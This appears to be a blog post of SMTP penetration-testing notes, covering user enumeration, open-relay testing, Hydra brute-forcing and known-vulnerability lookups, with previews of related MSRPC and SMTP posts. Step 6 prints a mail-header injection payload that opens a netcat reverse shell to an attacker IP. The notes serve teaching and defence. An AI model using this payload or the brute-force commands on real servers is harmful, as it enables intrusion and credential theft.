Skip to main content

SMTP Pentest Notes - Port 25

Pivoting for Red Teamers

SMTP Pentesting Notes

SMTP (Simple Mail Transfer Protocol) is a key component of email communication. Misconfigured SMTP servers can be vulnerable to attacks such as enumeration, open relay abuse, and authentication bypass.

Step 1: Enumerate the SMTP Server

Connect to the SMTP server using Telnet:

telnet <target-ip> 25

Look for the server banner, which may reveal its version and configuration.

Step 2: User Enumeration with VRFY & EXPN

Check if the server allows user verification:

VRFY admin
EXPN postmaster

If valid responses are received, the server is disclosing user accounts, which could aid brute-force attacks.

Step 3: Open Relay Testing

To check if the server allows unauthenticated email forwarding:

MAIL FROM:<attacker@example.com>
RCPT TO:<victim@example.com>
DATA
Subject: Open Relay Test
This is a test message.
.

If the email is delivered successfully, the server is an open relay and can be exploited for spam or phishing attacks.

Step 4: Brute-Forcing SMTP Authentication

Use Hydra to attempt brute-force login:

hydra -L users.txt -P passwords.txt smtp://<target-ip> -s 25

If credentials are found, they may be used for unauthorized email access or further exploitation.

Step 5: Finding SMTP Vulnerabilities

Check the server banner for version details:

220 mail.example.com ESMTP Postfix 2.9.6

Search for known vulnerabilities:

searchsploit postfix

Refer to databases such as:

Step 6: Privilege Escalation via Misconfigured Mail Scripts

If the SMTP server interacts with external scripts, it may be possible to execute commands remotely:

From: "|/bin/bash -c 'nc -e /bin/bash <attacker-ip> 4444'"
To: admin@example.com
Subject: Exploit Test

If vulnerable, this could lead to Remote Code Execution (RCE).

Mitigation Recommendations

  • Disable VRFY & EXPN to prevent user enumeration.
  • Require authentication to prevent unauthorized access.
  • Close open relays to block email abuse.
  • Enable logging & monitoring to detect suspicious activity.
  • Keep software updated to mitigate known vulnerabilities.

Conclusion

SMTP servers can be an attacker's entry point if not properly secured. Understanding and testing for vulnerabilities ensures a more secure email infrastructure.

Labels:

Comments

Post a Comment

Popular posts from this blog

Thread Modelling Cheatsheet: Know Your Weaknesses Before Attackers Do!

Threat Modelling Part - 1 What is Threat Modelling?      Threat modelling is the process of identifying, assessing, and mitigating potential security threats before they happen. It helps teams anticipate how systems can be attacked and build defences proactively , not reactively. Key Concepts Threat: Something (like a hacker or malware) that could exploit a weakness. Vulnerability: A flaw in your system that can be exploited. Risk: The chance that a threat will exploit a vulnerability to cause damage. Analogy : Threat = Burglar Vulnerability = Unlocked door Risk = Getting robbed because the door is open in a bad neighborhood  Threat Modelling Process (High-Level) Define the Scope – What systems/apps are you evaluating? Identify Assets – What needs protection? (e.g. data, services) Identify Threats – Think like an attacker. What could go wrong? Analyze Vulnerabilities – What weaknesses exist? Prioritize Ri...
Post a Comment
Read more

MSRPC (Microsoft Remote Procedure Call) Pentesting - Port 135

  It is also known as a function call or a subroutine call. Default ports are 135, 593. Enumeration nmap --script msrpc-enum -p 135 <target-ip> RPC Endpoints To enumerate RPC endpoints, use impacket-rpcdump. impacket-rpcdump -port 135 <target-ip> | grep -E 'MS-EFSRPC|MS-RPRN|MS-PAR' MS-EFSRPC: It might be vulnerable to PetitPotam. MS-RPRN, MS-PAR: It might be vulnerable to PrintNightmare. Metasploit msfconsole msf> use auxiliary/scanner/dcerpc/endpoint_mapper msf> use auxiliary/scanner/dcerpc/hidden msf> use auxiliary/scanner/dcerpc/management msf> use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor Connect # Anonymous logon rpcclient -N -U "" <target-ip> rpcclient -N -U "" -p 593 <target-ip> rpcclient -N -U "" dc.example.local # Specify username # -W: Workgroup # -N: No password rpcclient -U username <target-ip> rpcclient -W WORKGROUP -U username <target-ip> rpcclient -U username -N <target-ip...
Post a Comment
Read more

SMTP (Simple Mail Transfer Protocol) Pentesting - Port 25

 SMTP (Simple Mail Transfer Protocol) is a communication protocol for electronic mail transmission.it is used for sending e-mail. POP3 or IMAP are used for receiving e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS)   Connect We can use Telnet to connect to the remote server. Here is a command using Telnet: telnet example.com 25 Enumeration Identifying a SMTP Server You can use Nmap to check if there's an Telnet server on a target host like this: nmap -p25,465,587 -sV -Pn target.com Additional Nmap commands for enumeration nmap --script smtp-brute -p 25,465,587 "target-ip" nmap --script smtp-commands -p 25,465,587 "target-ip" nmap --script smtp-enum-users -p 25,465,587 "target-ip" nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 "target-ip" nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 "target-ip" nmap --script smtp-* -p 25,465,587 "target-ip" Enumer...
Post a Comment
Read more